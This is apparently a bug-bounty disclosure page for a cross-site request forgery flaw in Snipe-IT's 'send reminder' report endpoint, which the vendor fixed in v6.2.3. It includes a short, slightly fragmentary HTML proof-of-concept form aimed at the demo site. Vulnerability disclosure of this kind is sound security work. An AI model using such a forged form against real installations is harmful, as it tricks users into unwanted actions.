CSRF in Send Reminder in snipe/snipe-it


Reported on

Oct 7th 2023


CSRF in Send Reminder

Proof of Concept

1 .Attacker sent form fake to victim

     <form action="https://demo.snipeitapp.com/reports/unaccepted_assets/4/sent_reminder">
       <input type="submit" value="Submit request" />
         history.pushState('', '', '/');

2 .Victim click, execute send reminder unexpected

Video Poc



trick users into performing unwanted actions

We are processing your report and will contact the snipe/snipe-it team within 24 hours. 5 months ago
We have contacted a member of the snipe/snipe-it team and are waiting to hear back 5 months ago
snipe validated this vulnerability 5 months ago
hainguyen0207 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
snipe marked this as fixed in v.6.2.3 with commit 6d55d7 5 months ago
snipe has been awarded the fix bounty
5 months ago


oke, thank you.

This vulnerability has now been published 4 months ago
to join this conversation